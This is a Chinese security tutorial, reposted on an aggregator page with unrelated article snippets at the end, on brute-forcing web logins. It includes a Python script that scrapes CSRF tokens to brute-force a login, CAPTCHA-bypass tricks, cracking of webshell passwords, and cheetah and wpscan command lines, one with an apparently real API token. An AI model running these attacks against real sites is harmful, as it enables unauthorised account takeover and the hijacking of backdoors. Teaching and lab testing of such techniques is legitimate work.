Web安全——穷举爆破上篇(仅供学习)

Web安全

  • 一、概述
  • 二、常见的服务
    • 1、burpsuite 穷举后台密码
    • 2、burpsuite 对 webshell 穷举破解密码
    • 3、有 token 防御的网站后台穷举破解密码
      • 3.1 burpsuite 设置宏获取 token 对网站后台密码破解
      • 3.2 编写脚本获取token 对网站后台密码破解
    • 4、针对有验证码后台的穷举方法
      • 4.1 cookie 不存在不验证绕过
      • 4.2 后台登录验证码没销毁进行穷举
      • 4.3 网站后台验证码识别穷举密码
    • 5、phpmyadmin 密码穷举
    • 6、一句话木马后门破解
    • 7、cheetah 对一句后门密码穷举
    • 8、wordpress 博客系统用户密码穷举

一、概述

穷举就是枚举的意思,在互联网的今天,需要使用某种的服务,大多数都需要口令登录,这个口令就是密码,密码的强度分为,弱口令 、中度口令、强度口令。如果登录的服务为弱口令,那会存在很大的安全隐患,黑客通过穷举弱口令对服务进行攻击,很容易就得到登录密码。得到密码之后就能登录服务,进行其他危害较大得操作。黑客也能通过对用户得信息整理,组合密码进行穷举攻击。例如根据用户的生日号码,出身年月日和姓名进行口令组合,再对其服务进行穷举。

二、常见的服务

服务端口
web80
mysql3306
Microsoft SQL Server1433
https443
ftp21
ssh22
dns53
tomcat8080
redis6379
rsync873
PostgreSQL5432
cobaltstrike teamserver50050
smtp25
pop3110
远程终端 rdp3389
smb445
rpc135
imap143
NetBIOS139
SMTPS465
POP3S995
mogodb27018
memcached11211
telnet23
oracle1521

1、burpsuite 穷举后台密码

brupsuite 是一个安全测试套件, 提供了众多的测试功能。在火狐安装插件
FoxyProxy 填写 127.0.0.1 8080 保存为 burp 开启代理。
在这里插入图片描述
在这里插入图片描述
截取包之后发送到 intruder 在密码设置变量
在这里插入图片描述
选择 payloads 选择要穷举的字典
在这里插入图片描述
设置攻击后 根据返回的状态码 status 或者 length 网页长度对其进行判断。这里得到正确得密码是 123456
在这里插入图片描述
在这里插入图片描述
根据状态码 一般测试正确的是现实 302 状态码 另外就是响应网页的长度
在这里插入图片描述

2、burpsuite 对 webshell 穷举破解密码

灰帽子对网站攻破后,一般会留后门方便对其网站进行非法管理。后门的程序语音包括 asp php .net 这些脚本文件放在网站目录, 一般都采用单密码进行登录。通过扫描获取 webshell 的后门的网址。得到网址后可以对其进行密码穷举。

  • 1、burpsuite 截取数据包
    在这里插入图片描述
  • 2、发送到 intruder 模块
    在这里插入图片描述
  • 3、选择字典
    在这里插入图片描述
    最后得到密码是!@#sec

3、有 token 防御的网站后台穷举破解密码

有的网站后台存在 token 值,这个 token 通俗的名字叫令牌,每次刷新页面都会随机变化。提交请求时必须携带这个 token 值,可以利用这点避免后台进行直接穷举和防止 csrf 攻击。
在这里插入图片描述
在这里插入图片描述

3.1 burpsuite 设置宏获取 token 对网站后台密码破解

打开 burpsuite 刷新页面 接着 forward 放行这个数据包
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
来到 Project options --> Session-- >add 添加宏
在这里插入图片描述

在这里插入图片描述
选择 Run a macro
在这里插入图片描述

点击之后选择网页历史选择提交之后有 token 的页面。
添加宏
在这里插入图片描述

设置 configure item
在这里插入图片描述

在这里插入图片描述

add 添加规则
在这里插入图片描述

选择 value 的值 Parameter name 填写 user_token 这个值一定要相同
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这样宏就设置成功了。接着穷举测试 抓包 设置变量 添加密码字典。
在这里插入图片描述

开始攻击 可以看到每次的 token 值都不一样
在这里插入图片描述
在这里插入图片描述
密码是 password

3.2 编写脚本获取token 对网站后台密码破解

就上面的登录页面来说。
在这里插入图片描述

每次访问页面这个 user_token 都会变化导致不能重复提交。
验证原理每次页面生成user_token 存在seesion 里面每次登录用session 里取出来然后验证如果验证成功 就进行密码匹配。如果验证不成功就输出 csrf 错误。

脚本源码

#coding:utf-8
import requests
import reurl = "http://www.c3moon.com/login.php"def login(password):session = requests.session()req=session.get(url)user_token=re.search("[a-z0-9]{32}",req.text).group(0) #32md5data={"username":"admin","password":password,"Login":"Login",'user_token':user_token}req=session.post(url=url,data=data,allow_redirects=True)html = req.textreturn htmlwith open('top1000.txt') as p:passlist =p.readlines()p.close()for line in passlist:line = line.strip("\n")print(line)if 'File Upload' in login(line):print( "[* 密码 is %s *]" % line )break

密码破解成功
在这里插入图片描述

4、针对有验证码后台的穷举方法

网站后台或者有登录的地方都可能存在验证码验证,验证码的作用 不少网站为了防止用户利用机器人自动注册、登录、灌水,都会采用验证码技术,所谓的验证码,就是将一串随机产生的数字和符号,生成一幅图片,在图像上加上干扰像素(防止 orc),要用户用肉眼识别其中的验证码信息,输入表单提交网站验证。验证后使用网站某个功能.但是如果验证码逻辑编写不好会存在被绕过的风险。

4.1 cookie 不存在不验证绕过

有些网站如果网站不存在 cookie 就不会验证 验证码
在这里插入图片描述
这里cookie即与这里相对应:
在这里插入图片描述
在这里插入图片描述
这里即可以看到发下的验证码:GUTF。
在这里插入图片描述
在这里插入图片描述
这里先对比验证码,再对比账号密码,我们这里再次发送:
在这里插入图片描述
这里我们回到虚拟机查看验证码:
在这里插入图片描述
可以看到这里验证码没有,肯定验证不成功。
在这里插入图片描述
这里我们将验证码删掉,可以看到依然是验证码失效的状态。
下面我们进行删除 PHPSESSION 信息 验证码就不进行验证了。
在这里插入图片描述
接着对密码进行穷举
在这里插入图片描述
在这里插入图片描述
破解密码成功,登录后台。
在这里插入图片描述

4.2 后台登录验证码没销毁进行穷举

在登录提交的时候进行验证码验证 不管密码是否正确,都要销毁验证码。不然验证码可复用确定的验证码
在这里插入图片描述
在这里插入图片描述

错误的验证码
导入字典进行提交
在这里插入图片描述

4.3 网站后台验证码识别穷举密码

验证码干扰像素太少很容易就会被一些工具识别出来。如图片提取文字工具。
在这里插入图片描述
登录框存在验证码 这个验证码可被识别的情况下 就会被穷举密码。
在这里插入图片描述
将 burpsuite 的包放进验证码识别工具 设置字典和验证码参数
在这里插入图片描述
接着选择爆破栏 选择错误的验证码关键词 设置线程 点击 start 即可 可以选择再次爆破 验证准确率会提高。
在这里插入图片描述
在这里插入图片描述
最后查看响应长度 获取正确的密码。

5、phpmyadmin 密码穷举

phpmyadmin 是 mysql 的一个 web 管理工具,可以通过这个工具穷举 mysql 用户的账号和密码。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

6、一句话木马后门破解

一句话后门可以使用 burpsuite 通用穷举方法穷举密码。
在这里插入图片描述
抓包 将 cmd 设置成变量 添加字典即可
在这里插入图片描述
在这里插入图片描述
关键字

asp
qweasd123=execute("response.clear:response.write(""passwordright""):response.end")
php
echo "password right";
aspx qweasd123=Response.Write("moonsec"); 密码是 qweasd123

7、cheetah 对一句后门密码穷举

cheetah 是针对一句话后门的穷举工具

python cheetah.py -u http://orz/orz.php
python cheetah.py -u http://orz/orz.jsp -r post -n 1000 -v
python cheetah.py -u http://orz/orz.asp -r get -c -p data/pwd.list
python cheetah.py -u http://orz/orz -w aspx -s iis -n 1000 
python cheetah.py -b url.list -c -p pwd1.list pwd2.list -v
cheetah.py -u http://www.c1moon.com/a.php -n 1000 -v -p data/pwd.list 
cheetah.py -u http://www.c1moon.com/a.asp -n 1000 -v -p data/pwd.list 
cheetah.py -u http://www.c1moon.com/a.aspx -n 1000 -v -p data/pwd.list

在这里插入图片描述

支持 asp php .net jsp 后门
在这里插入图片描述

-u 后门地址
-r 提交的方法 一般是 post
-n 一次提交密码的数量
-v 详细信息
-p 字典位置例子
python cheetah.py -u http://www.c1moon.com/cmd.php -r post -n 1000 -v

在这里插入图片描述

8、wordpress 博客系统用户密码穷举

wordpress 是知名的博客系统,在互联网上的占有量很大,所以一定要知道这套系统的弱口令穷举的方法。
https://wpscan.com 首先到这个网站注册账号和密码注册后获取 token
在这里插入图片描述

自动找账号信息 然后登录穷举

wpscan --url http://www.redteam.com/ -e u -P /home/kali/top100password.txt --api-token QYbHH6fbNDIi6Op3MQuvg85fD4fhNiB4RKJsVOMVp6w

手动收集 wordpress 用户信息 访问连接获取用户信息
http://www.vtmoon1.com/wp-json/wp/v2/users

获取信息可以再进行指定用户爆破
在这里插入图片描述

wpscan --url http://www.vtmoon1.com -U moonsec -P /home/kali/top1000.txt

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/94552.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Gateway的服务网关

Gateway服务网关 Gateway网关是我们服务的守门神&#xff0c;所有微服务的统一入口。 网关的核心功能特性&#xff1a; 请求路由 权限控制 限流 架构如下&#xff1a; gateway使用 引入依赖 创建gateway服务&#xff0c;引入依赖 <!--网关--> <dependency>…

C语言记录程序日志

我们写程序&#xff0c;不可能一次就写的一个bug都没有&#xff0c;必须要不停地修改&#xff0c;有可能自己调试已经没有问题了&#xff0c;发给客户后还是问题很多&#xff0c;这个时候跑到客户处解决问题就不现实了&#xff0c;自己不在还要找到问题的所在&#xff0c;最好的…

每日一题(链表中倒数第k个节点)

每日一题&#xff08;链表中倒数第k个节点&#xff09; 链表中倒数第k个结点_牛客网 (nowcoder.com) 思路: 如下图所示&#xff1a;此题仍然定义两个指针&#xff0c;fast指针和slow指针&#xff0c;假设链表的长度是5&#xff0c;k是3&#xff0c;那么倒数第3个节点就是值为…

链表OJ练习(2)

一、分割链表 题目介绍&#xff1a; 思路&#xff1a;创建两个链表&#xff0c;ghead尾插大于x的节点&#xff0c;lhead尾插小于x的节点。先遍历链表。最后将ghead尾插到lhead后面&#xff0c;将大小链表链接。 我们需要在创建两个链表指针&#xff0c;指向两个链表的头节点&…

SpringBoot 整合 RabbitMQ

1. 创建 SpringBoot 工程 把版本改为 2.7.14 引入这两个依赖: <dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-amqp</artifactId></dependency><dependency><groupId>org.springfr…

spring boot项目生成容器并运行

一个安静的周末&#xff0c;shigen又睡懒觉了&#xff0c;上次说的拖延症的惩罚来了&#xff1a;早晚各100个健腹轮练习&#xff0c;早上的已经完成了。今天的文章来的有点晚&#xff0c;但是依旧保持质量。 springboot项目生成容器并运行 背景 将springboot项目打包成jar包&…

使用这个插件,fiddler抓包直接生成httprunner脚本

har2case可以将.har文件转化成yaml格式或者json格式的httprunner的脚本文件&#xff0c;生成.har格式文件可以借助 fiddler 或 Charles 抓包工具 友情提示&#xff1a; 录制脚本&#xff0c;只是一个过渡&#xff0c;从0到1的一个过渡&#xff0c;如果让你直接写脚本&#xf…

iOS开发Swift-7-得分,问题序号,约束对象,提示框,类方法与静态方法-趣味问答App

1.根据用户回答计算得分 ViewController.swift: import UIKitclass ViewController: UIViewController {var questionIndex 0var score 0IBOutlet weak var questionLabel: UILabel!IBOutlet weak var scoreLabel: UILabel!override func viewDidLoad() {super.viewDidLoad()…

MySQL8.0.22安装过程记录(个人笔记)

1.点击下载MySQL 2.解压到本地磁盘&#xff08;注意路径中不要有中文&#xff09; 3.在解压目录创建my.ini文件 文件内容为 [mysql] # 设置mysql客户端默认字符集 default-character-setutf8[mysqld] # 设置端口 port 3306 # 设计mysql的安装路径 basedirE:\01.app\05.Tool…

SpringBoot自定义消息总线

一、前言 在现代的分布式系统中&#xff0c;消息传递已成为一个非常流行的模式。它使得系统内的不同部分可以松耦合地通信&#xff0c;从而实现更高效、更可靠的应用程序。本博客将介绍SpringBoot如何提供简单易用的消息传递机制&#xff0c;并展示如何自定义消息总线以满足特定…

WSL中为Ubuntu和Debian设置固定IP的终极指南

文章目录 **WSL中为Ubuntu和Debian设置固定IP的终极指南****引言/背景****1. 传统方法****2. 新方法:添加指定IP而不是更改IP****结论**WSL中为Ubuntu和Debian设置固定IP的终极指南 引言/背景 随着WSL(Windows Subsystem for Linux)的普及,越来越多的开发者开始在Windows…

基于Gin框架的HTTP接口限速实践

在当今的微服务架构和RESTful API主导的时代&#xff0c;HTTP接口在各个业务模块之间扮演着重要的角色。随着业务规模的不断扩大&#xff0c;接口的访问频率和负载也随之增加。为了确保系统的稳定性和性能&#xff0c;接口限速成了一个重要的话题。 1 接口限速的使用场景 接口…